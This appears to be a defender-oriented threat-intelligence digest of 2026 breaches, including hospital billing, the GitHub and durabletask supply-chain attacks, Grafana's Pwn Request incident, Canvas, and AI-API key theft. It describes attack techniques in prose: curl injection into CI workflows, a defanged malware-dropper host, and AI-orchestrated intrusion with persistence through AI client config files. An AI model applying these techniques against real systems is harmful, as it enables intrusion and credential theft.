Breach at billing processor Unimed exfiltrates ~97,600+ patient records from six German university hospitals (attribution open)

Unimed, a Saarland-based billing-service provider that handles private-insurance and self-payer invoicing for an estimated 95% of German university hospitals, was breached in mid-April 2026; attackers exfiltrated patient data and an attempted full encryption of Unimed's infrastructure was reportedly averted (heise online, 2026-05-22). On 2026-05-21 at least six state-funded Universitätsklinikum hospitals — Cologne, Freiburg, Heidelberg, Tübingen, Ulm and Mannheim — disclosed that their patients' data was among the stolen records (The Record, 2026-05-22). University Hospital Freiburg states master data for ~54,000 patients (names, addresses, dates of birth) was taken, with billing records for ~900 patients additionally exposing diagnoses and treatment methods, and bank-account data in a small number of those cases (Uniklinik Freiburg, 2026-05-21); Cologne reports ~30,000 affected (Uniklinik Köln, 2026-05-21). The exposed categories include GDPR Article 9 special-category health data (diagnoses, treatment codes) and financial data (IBANs). Attribution is open: heise states it is "not yet known who is responsible" for the Unimed attack, and The Record likewise reports no actor had publicly claimed responsibility at its publication. The intrusion does rhyme with the earlier ARWINI Lower-Saxony statutory-billing breach (covered 2026-05-19) — which the Hannover Police Directorate attributed to the Kairos ransomware group per heise — but that resemblance is an analyst pattern-overlap, not a sourced attribution of the Unimed breach.

Defender takeaway: This is the recurring "shared-service processor as the soft underbelly of healthcare" pattern — the hospitals' own clinical systems held, but a third-party billing aggregator concentrated Art. 9 data for dozens of institutions and became the single point of failure. heise notes encryption was attempted but blocked while exfiltration over the same access succeeded, the classic gap where endpoint controls stop the ransomware payload but not the prior data theft. CH/EU hospitals running outsourced billing should inventory which processors hold Art. 9 data on their behalf, confirm a data-protection impact assessment and Art. 32 technical measures are in place, and hunt for large outbound transfers from billing/ERP systems with no corresponding inbound job trigger and for service-account authentication outside business hours.

Check Point Research's March-April 2026 AI Threat Landscape Digest (published 2026-05-22) is the operationally most striking annual / periodic AI report of the past month. The centrepiece — researched by Gambit Security and summarised in the Check Point post — documents a single unidentified operator compromising nine Mexican government agencies between December 2025 and February 2026, covering tax records, civil registry, patient files and electoral infrastructure. The structural innovation: the attacker ran two commercial AI platforms in parallel — one managing live exploitation and issuing >5,000 AI-executed commands, a second processing harvested data and feeding instructions back into the first. Persistence for the AI itself was simple: modifying the AI client's startup configuration file to embed persistent instructions inherited by every subsequent session.

Two further findings have direct EU/CH public-sector implications. First, the EvilTokens platform — a commercial jailbreak-as-a-service tool packaging AI-driven phishing generation, financial-data extraction and similar capabilities as a subscription — represents the same commoditisation curve as Kali365 (§ 1) but for AI-assisted intrusion. Second, CPR explicitly calls out that stolen API keys for Anthropic, OpenAI, Groq and Mistral are now high-value criminal targets, since they grant access to powerful AI services without an account; Swiss federal and cantonal agencies using commercial AI APIs should treat key rotation cadence and source-IP scoping (Conditional Access on the API layer) on par with classic privileged-credential hygiene. Detection vantage: bulk exfiltration events temporally co-located with anomalous API call patterns to commercial AI services from non-standard processes; process trees in which AI client libraries spawn data-collection subprocesses; cloud audit logs showing API key issuance followed immediately by large-volume inference calls from unusual source IPs.

UPDATE (originally covered 2026-05-13 deep dive; multiple subsequent updates): three new TeamPCP / Mini Shai-Hulud developments landed in this window — GitHub itself, the official Microsoft durabletask PyPI package, and the Grafana Labs root-cause disclosure.

GitHub. GitHub confirmed on 2026-05-20 that TeamPCP (also tracked as UNC6780) accessed approximately 3,800 internal GitHub repositories after a single GitHub employee installed a poisoned Visual Studio Code extension on their device (The Hacker News, 2026-05-20; The Record, 2026-05-20; Infosecurity Magazine, 2026-05-20; Help Net Security, 2026-05-20). GitHub detected and contained the breach on 2026-05-19, isolated the affected endpoint and rotated high-impact secrets; the company states there is no evidence customer data stored outside the internal repositories was accessed. GitHub has not publicly named the malicious VS Code extension or its publisher at this writing. TeamPCP listed the stolen repositories — including GitHub Actions internals, agentic-workflow code, Copilot internal projects, CodeQL tools, Codespaces, Dependabot, and a Rails controller managing organisations and PRs — for sale at $50,000, with LAPSUS$ announcing a joint sale and a $95,000 asking price.

durabletask (PyPI). Wiz Security reported on 2026-05-20 that the TeamPCP / Mini Shai-Hulud worm compromised the official Microsoft durabletask PyPI package via versions 1.4.1, 1.4.2 and 1.4.3 (Wiz, 2026-05-20). The payload is a dropper that fetches rope.pyz from check.git-service[.]com; per Wiz the second stage is a full credential stealer targeting AWS, Azure, GCP, Kubernetes and Vault credentials, 1Password and Bitwarden vaults, filesystem credentials and shell history. Propagation per Wiz: on Kubernetes hosts the worm uses kubectl exec; on AWS EC2 instances it propagates via AWS Systems Manager SendCommand against up to 5 targets per host (T1078.004 Cloud Accounts, T1570 Lateral Tool Transfer).

Grafana Labs. Grafana Labs published the post-mortem of its own TeamPCP breach on 2026-05-19, confirming the root cause was a single GitHub Actions workflow token that slipped through the rotation process after the TanStack npm supply-chain attack (Grafana Labs, 2026-05-19; BleepingComputer, 2026-05-20). Per Grafana's own post-mortem the TanStack compromise was detected on 2026-05-11 (note: BleepingComputer cites 2026-05-01 for the malicious-package consumption event — surfaced as a contradiction in § 7); Grafana rotated the bulk of its GitHub workflow tokens, but the residual unrotated token gave TeamPCP access to clone private source-code repositories (exact count not disclosed in Grafana's post-mortem). Grafana refused the extortion demand on 2026-05-16. The exfiltration scope is confirmed limited to Grafana Labs GitHub repositories (public source code, private source code and internal repos); customer production data was not affected.

Defender takeaway: audit VS Code extension marketplace policies and consider a managed extensions allowlist via Group Policy / MDM (the VS Code marketplace does not enforce mandatory code-signing). Hunt — Sysmon EID 1 for code --install-extension invocations on developer endpoints; process trees where Code.exe or code-server spawn credential-access tools (git-credential-manager, aws configure, keychain access). Audit GitHub Actions OIDC token rotation completeness after any supply-chain incident; verify GitHub secret-scanning + push-protection are enabled on every org. CI/CD pipeline logs should be searched for durabletask imports in the 1.4.1–1.4.3 version range; treat any host that imported a malicious version as fully compromised. Review AWS SSM SendCommand audit logs for invocations that do not correspond to authorised maintenance windows.

7-Eleven, Inc. confirmed on 2026-05-18 that an unauthorised third party accessed systems storing franchisee documents on 2026-04-08, in a breach claimed by ShinyHunters on or around 2026-04-17 (SecurityWeek, 2026-05-18; Security Affairs, 2026-05-18). ShinyHunters listed over 600,000 Salesforce CRM records covering personal and corporate data from franchise applications, initially demanding a ransom with a 2026-04-21 deadline and then offering the data for sale at $250,000 on a hacker forum. 7-Eleven filed a Maine Attorney General notification dated 2026-05-01 confirming 24 months of IDX identity-theft protection for affected individuals (Maine AG breach notification, 2026-05-01). The Maine filing lists only 2 Maine residents but the ShinyHunters claim covers 600,000+ records globally. SecurityWeek attributes the broader campaign — Instructure (Canvas), Vimeo, Wynn Resorts (21,000 employees), Vercel and Medtronic among confirmed co-victims — not to Salesforce-product vulnerabilities but to phishing, third-party-integration abuse, and customer-side misconfiguration of Salesforce Connected Apps.

Why it matters to us: ShinyHunters is the same actor that hit Instructure last week, with the broader Salesforce-targeting campaign continuing across sectors. The campaign vector is identity-side rather than Salesforce-product-side — Connected App OAuth grant abuse, phishing of admin sessions, mis-scoped third-party SaaS integrations. EU/CH public-sector and finance tenants using Salesforce for partner / supplier / case-management data should audit Connected App OAuth grants (particularly to third-party AI SaaS integrations), enable Salesforce Event Monitoring with alerts on bulk Report Export events and high-volume SOQL API calls, enforce IP-range / Trusted-IP session policies, and consider Salesforce Shield field-level encryption for PII. T1078.004 (Cloud Accounts), T1530 (Data from Cloud Storage Object), T1567.002 (Exfiltration to Cloud Storage).

UPDATE (originally covered 2026-W21): Grafana Labs issued an official 2026-05-18 confirmation of the GitHub Pwn-Request breach previously reported in the 2026-W21 weekly summary (SecurityWeek, 2026-05-18; BleepingComputer, 2026-05-18; The Register, 2026-05-18). The material new disclosures in the 2026-05-18 confirmation: Grafana explicitly states (a) only source code was accessed — "no personal or customer information was stolen"; (b) the incident has not impacted customer systems or operations; (c) the ransom was refused. The technical-mechanism details (pull_request_target workflow misconfiguration, forked-PR injection of a curl command, harvested write-scoped GitHub token, canary-token detection) were previously reported in the 2026-W21 weekly summary citing THN's earlier coverage (The Hacker News, 2026-05-17); they are repeated here as context for defenders who did not catch the weekly. CoinbaseCartel is assessed by THN as an offshoot of the ShinyHunters / Scattered Spider / LAPSUS$ ecosystem and has accumulated ~170 victims since September 2025.

Defender takeaway: Grafana OSS is the de facto monitoring/observability platform in EU/CH public-sector SOC and NOC environments; defenders should monitor non-official Grafana plugin updates and unsigned Grafana agent builds for the next 30 days as a potential supply-chain trojanisation follow-on. The Pwn-Request attack pattern is the same class of CI/CD misconfiguration covered by SentinelOne's Living off the Pipeline taxonomy (referenced 2026-05-16); audit every pull_request_target workflow to ensure no privileged steps run on untrusted-fork code, set permissions: read-all at workflow level and elevate only as needed, and separate privilege-requiring steps into a second workflow_run workflow gated on merged code. MITRE T1195.002 / T1552.004 / T1567.

Canvas LMS serves Swiss federal universities (ETH, EPFL), cantonal university systems, and major EU higher-education institutions. The ShinyHunters double-intrusion and ransom payment create ongoing GDPR Art. 33/34 notification exposure for all EU institutions that deployed Canvas and received student-data-scope notifications from Instructure. The US House investigation deadline (2026-05-21) is a political milestone; the regulatory follow-up from EU supervisory authorities (Germany, Austria, Switzerland) is the operationally relevant compliance risk for this audience.

On 2026-05-16, Grafana Labs disclosed that CoinbaseCartel — a data-extortion group active since September 2025, focusing exclusively on theft without encryption — exploited a pull_request_target GitHub Actions workflow misconfiguration ("Pwn Request") to exfiltrate a privileged GitHub token and clone the private codebase. The attack vector: fork a public repository, inject curl into the pull_request_target workflow to dump environment variables to an encrypted file, delete the fork to erase evidence. Grafana detected the exfiltration via a triggered canary token embedded in the private code (not from automated secrets-scanning). Ransom was demanded and rejected. Grafana confirmed no customer data, production systems, or running infrastructure was accessed — the exposure was private source code. The canary-token detection is an instructive model; the pull_request_target vulnerability class is the same pattern documented in tj-actions/changed-files (SLSA gap).

Hunt for this in your own GitHub organisation: audit logs for pull_request_target workflow runs where head_repository.owner differs from the base repository owner.

Customer PII and password hashes exposed; logging-gap prevented exfiltration confirmation. The defender's learning is the logging-coverage point: a breach where the victim cannot confirm what was exfiltrated is a logging-design failure. Pattern-match: which of your own citizen-facing / customer-facing e-commerce flows would leave you with the same uncertainty after an intrusion? (daily 2026-05-12).

Published 2026-05-15. Vendor-agnostic survey of 5,000 IT and security leaders across 17 countries (Q1 2026 fieldwork). The defender-relevant findings beyond the headline 71% identity-breach figure: (a) identity-to-ransomware pipeline dominant — 67% of ransomware victims attributed their ransomware incident directly to a prior identity attack, establishing identity-protocol abuse as the operationally dominant initial-access pattern; (b) non-human identity (NHI) mismanagement is the leading root cause — service accounts, API keys, AI-agent identities outnumber human identities by ratios up to 100:1 in surveyed organisations, weak NHI lifecycle management was the root cause in 41% of successful identity breaches, only 34% of organisations regularly audit NHI accounts; (c) Switzerland records the highest identity-breach incidence globally in the survey period; the daily 2026-05-15 also reported energy as the hardest-hit sector (Sophos blog; Help Net Security — Sophos 2026 identity-breach costs report; daily 2026-05-15).

The synthesis lens the daily did not have room for: the Sophos data corroborates the W19 Mandiant M-Trends finding that identity-rooted intrusions dominate IR-case data, and it converges with the Verizon DBIR 2026 finding (below) that stolen credentials remain the most common initial-access vector. The composite picture: for Swiss federal / cantonal estates with high service-account density and no NHI lifecycle governance, the NHI inventory + lifecycle gap is the single highest-leverage control deficit disclosed in this week's research output. The Sophos data is the empirical basis for prioritising NHI governance over endpoint-EDR upgrades, where budget pressure forces a choice. Detection focus: anomalous service-account Kerberos TGS requests (T1558.003 Kerberoasting), unusual OAuth token grants from CI/CD service identities, API key usage from unexpected source IPs or geographies.

Sophos published its State of Identity Security 2026 survey on 2026-05-14, drawing on responses from IT and cybersecurity leaders across 17 countries (Help Net Security, 2026-05-14). The headline finding is that more than 70% of surveyed organisations experienced at least one identity-related breach in the prior 12 months. Swiss organisations recorded the highest breach incidence among all surveyed countries. Sector analysis places energy, oil/gas, and utilities alongside federal government as the verticals with the highest breach rates — and two-thirds of ransomware victims in the survey attributed initial access to an identity compromise: stolen credentials, session hijacking, or MFA bypass. The survey corroborates NCSC-CH's sustained advisory focus on credential abuse and the trend visible across this brief series (Lumma Stealer takedown, FamousSparrow credential harvesting, TeamPCP OIDC token theft). Defenders in CH/EU public-sector environments should audit conditional access policies and MFA resilience controls — particularly for energy-sector service accounts and Entra ID/ADFS federations — against the pattern of phishing-resistant MFA requirements in NCSC-CH guidance.

The Dutch Health & Youth Care Inspectorate (Inspectie Gezondheidszorg en Jeugd, IGJ) issued a public finding on 2026-05-13 concluding that Clinical Diagnostics LCPL BV and NMDL BV (Rijswijk) did not meet the mandatory NEN 7510 information-security standard at the time of their July 2025 ransomware breach, and had not fully remediated the deficiencies as of IGJ's December 2025 follow-up inspection (IGJ, 2026-05-13; native title: "Clinical Diagnostics voldeed niet aan wettelijke norm voor informatiebeveiliging" — "Clinical Diagnostics did not meet the statutory information-security standard"). NEN 7510 is the Dutch statutory information-security baseline for healthcare organisations under the Wabvpz, structurally aligned with ISO/IEC 27001 but extended for health-data obligations; non-compliance is independently actionable by multiple regulators.

IGJ's two named failures are foundational rather than technical: (1) no independent audit of the laboratory's information security had ever been performed, and (2) the organisation had not periodically assessed its processing risks, leaving it unable to determine which controls were necessary. The July 2025 breach — Computable's prior reporting attributes it to the Nova ransomware group — exposed approximately 941,000 patients' personal and medical records, including cervical-cancer screening results processed for the population-screening programme Bevolkingsonderzoek Nederland (Computable, 2026-05-13). IGJ has no fining power and has demanded short-term independent NEN 7510 certification; Autoriteit Persoonsgegevens (Dutch DPA), whose GDPR enforcement carries fines, is running a parallel investigation. IGJ also signalled sector-wide enforcement intent by publicly calling for all healthcare providers to demonstrate independent certification — a leading indicator of broader inspection cadence.

For a Swiss SOC the parallel is direct: NEN 7510 is the regulatory analogue of the EPDG (Bundesgesetz über das elektronische Patientendossier) security profile, and the two specific failures — absence of third-party audit, absence of periodic risk assessment — are the same hygiene-baseline gaps Swiss healthcare providers face under cantonal supervision. The breach scale (941k records, mass-screening data) is the proximate consequence of those structural gaps; the operationally useful read for defenders is detection of NEN-7510-style baseline gaps via third-party assessment, not signature hunting.

Škoda Auto Deutschland GmbH disclosed on 2026-05-11 that an unauthorised actor exploited a vulnerability in the standard shop-software platform underlying its German online-retail store, accessing customer names, postal addresses, email addresses, telephone numbers, order history, account data and password hashes (Škoda Auto Deutschland — Sicherheitsvorfall Škoda Shop; SecurityWeek, 2026-05-11). Credit-card data was not exposed — payment processing is delegated to external PSPs and never stored in the shop database. Škoda's own monitoring detected the intrusion; the shop was taken offline, the underlying vulnerability patched, and external forensics retained. The disclosure flags one notable operational shortfall in the company's own framing: insufficient logging coverage prevents investigators from determining definitively whether the accessed data was actually exfiltrated, so customers must be treated as if it was. Škoda Auto a.s. is a VW Group subsidiary headquartered in Mladá Boleslav (Czech Republic); the German operating company's notification reached the competent EU supervisory authority within the GDPR Article 33 72-hour window. No threat actor has been attributed.

Defender takeaway: The exfiltration-uncertainty pattern this announcement makes public — "we know they read the database; we cannot prove they copied it" — is the dominant blind spot in EU e-commerce / customer-portal architectures whose security stack stops at the WAF and forgets about application-tier or database-tier query auditing. Concrete hardening: enable verbose query logging on the back-end DB for read-traffic anomalies (volume spikes per session, atypical filter cardinality), capture and retain HTTP response sizes at the WAF for n-times-baseline analytics, and forward both into the SIEM with retention measured in months rather than days. Downstream risk: the affected customer count and password-hash algorithm have not been disclosed in either cited source; defenders should treat any leaked password-hash dataset as plaintext-recoverable on a quarter-or-shorter horizon (GPU cracking yield against unknown-algorithm hashes is non-zero) and add Škoda customer email addresses to credential-stuffing watchlists at federated O365 / Google Workspace tenants for the next quarter.

Canvas / Instructure is the cleanest example of a campaign chain that accumulated meaningfully different state every day of 2026-W19, and the one a SOC manager carries into Monday morning with an extortion deadline two days out. Day-by-day: 2026-05-06 — Instructure confirmed names, email addresses, student ID numbers, and user-to-user messages accessed; detected API-tool disruption ~2026-04-30; revoked privileged credentials and access tokens; passwords / financial data / government IDs out of scope; ShinyHunters claimed 275 M records across ~9,000 institutions including EU and APAC (BleepingComputer, 2026-05-04 · TechCrunch, 2026-05-05 · SecurityWeek, 2026-05-04 · daily 2026-05-06). 2026-05-07 — individual universities (University of Nevada Reno, University of Pennsylvania ~300,000+ users) began notifying students and staff directly (University of Nevada Reno president message, 2026-05-06 · daily 2026-05-07 UPDATE). 2026-05-08 — SURF (Dutch NREN) confirmed 44 Dutch institutions among victims; attacker posted portal defacements; 2026-05-12 extortion deadline set; Canvas taken offline for emergency patching on 2026-05-07 (NL Times — Canvas hack: student data from 44 Dutch universities and schools taken · The Next Web — largest education data breach in history · daily 2026-05-08 UPDATE). 2026-05-09 — three major UK universities (Oxford, Cambridge, Liverpool — Liverpool notified ICO under GDPR Article 33) issued public statements; UNL confirmed 44 Dutch member institutions; 3 GB sample dump on 2026-05-07 contained course-IDs, student emails, assignment metadata, grade records across four UK institutions; Instructure stated the breach vector was a compromised integration service account for a third-party LTI tool provider (not Canvas core infrastructure). The ShinyHunters / WorldLeaks operator-family attribution and the specific extortion-amount figure carried in the daily UPDATE trace to sources not re-fetched at weekly composition time; readers should consult the daily UPDATE for the citation chain (daily 2026-05-09 UPDATE). 2026-05-10 — ShinyHunters posted a second intrusion notice 2026-05-08 asserting Canvas retained unpatched vulnerabilities permitting re-entry despite the May 8 patches; Instructure confirmed the second breach, rotated application keys, increased monitoring, and required API-client re-authorisation; seven Dutch universities (VU Amsterdam, University of Amsterdam, Erasmus Rotterdam, Tilburg, Eindhoven TU/e, Maastricht, Twente) executed emergency Canvas disconnections on/before 2026-05-09; Dutch DPA (Autoriteit Persoonsgegevens) received an incident report from VU Amsterdam (Techzine EU, 2026-05-08 · DutchNews.nl, 2026-05-08 · daily 2026-05-10 UPDATE).

State at week-end: 2026-05-12 extortion deadline is Tuesday (two days out); no ransom paid as of 2026-05-09 06:00 UTC; if the second-intrusion claim verifies, Instructure's remediation was incomplete and the data-release threat is materially more credible. European universities running Canvas should treat credential-stuffing risk on stolen student / staff emails as active; audit third-party LTI integrations and revoke service accounts for unused integrations; watch for follow-on phishing campaigns referencing course content. GDPR Article 33/34 notification clocks run from the date Instructure provided scope confirmation to the institution.

Trellix, a major endpoint-security / XDR vendor serving enterprise and government customers globally, confirmed on 2026-05-04 that an unauthorised party accessed a portion of its internal source code repository. The company engaged external forensic specialists and notified law enforcement; Trellix stated no evidence was found that its product code-release or distribution pipeline was affected and no evidence the accessed code was exploited or altered. The initial access vector, duration of access, scope of repositories affected, and customer data impact have not been disclosed (BleepingComputer, 2026-05-04 · The Hacker News, 2026-05-04 · daily 2026-05-06). Defender takeaway: organisations running Trellix endpoint or XDR products should maintain elevated scrutiny on Trellix software updates until the forensic investigation publicly concludes; the supply-chain integrity question — could the accessed code be re-used by an attacker for bug discovery or implant tailoring? — remains unresolved.

Braintrust, a US-based AI evaluation and observability platform, confirmed on 2026-05-06 that an attacker accessed one of its AWS accounts on 2026-05-04 (TechCrunch, 2026-05-06 · SecurityWeek, 2026-05-08). The compromised account contained organisation-level API keys customers use to connect to upstream LLM providers (OpenAI, Anthropic, Azure OpenAI). SecurityWeek separately notes that customers commonly federate access from Braintrust into Box, Cloudflare, Dropbox, Notion, Ramp, and Stripe, framing those as adjacent SaaS providers whose credentials warrant the same audit posture; the Braintrust statement itself does not enumerate exposed third-party credentials. Braintrust locked the account, audited related infrastructure, rotated internal secrets, and instructed every customer to rotate organisation-level AI provider credentials regardless of whether their specific keys were confirmed exposed. One customer was confirmed compromised and three others reported anomalous AI usage spikes consistent with credential abuse during the post-incident review. No specific Swiss/EU customer impact was identified in available sources at this run's window close.

The incident class is architecturally significant for European public-sector AI pilots: AI-evaluation and observability platforms aggregate API credentials for many LLM providers per customer organisation, so a single SaaS-tier compromise propagates into a multi-provider credential event for every downstream tenant. The same risk profile applies to AI gateways (LiteLLM, see § 4 / § 6 KEV deadline), agent-evaluation harnesses, prompt-rule-based observability, and AI prompt-management platforms.

Defender takeaway: Inventory which AI-tooling SaaS vendors hold organisation-level upstream-provider keys; require per-environment scoping (dev / staging / prod) and short TTLs; require provider-side anomaly alerts for unusual call-volume or geographic-origin shifts; treat any 2026-05-04 → 2026-05-06 audit-log gap on Braintrust as potentially related to this incident, even when keys were not labelled as confirmed exposed.

Eurail began issuing breach notifications to 308 777 customers in late April 2026, revealing that an attacker accessed personal data — including passport numbers, IBANs, and DiscoverEU pass details — in a December 2025 incident. The three-month gap between discovery and notification is under review by the Autoriteit Persoonsgegevens (Dutch DPA) and the European Data Protection Supervisor (EDPS), which holds jurisdiction over EU institutional data processing. GDPR Article 33 requires supervisory authority notification within 72 hours of awareness of a breach. The exposed dataset covers travellers from EU member states who registered DiscoverEU passes; Swiss nationals who applied through bilateral arrangement may also be affected. Affected individuals should monitor for identity fraud and, where banking regulations permit, consider IBAN replacement.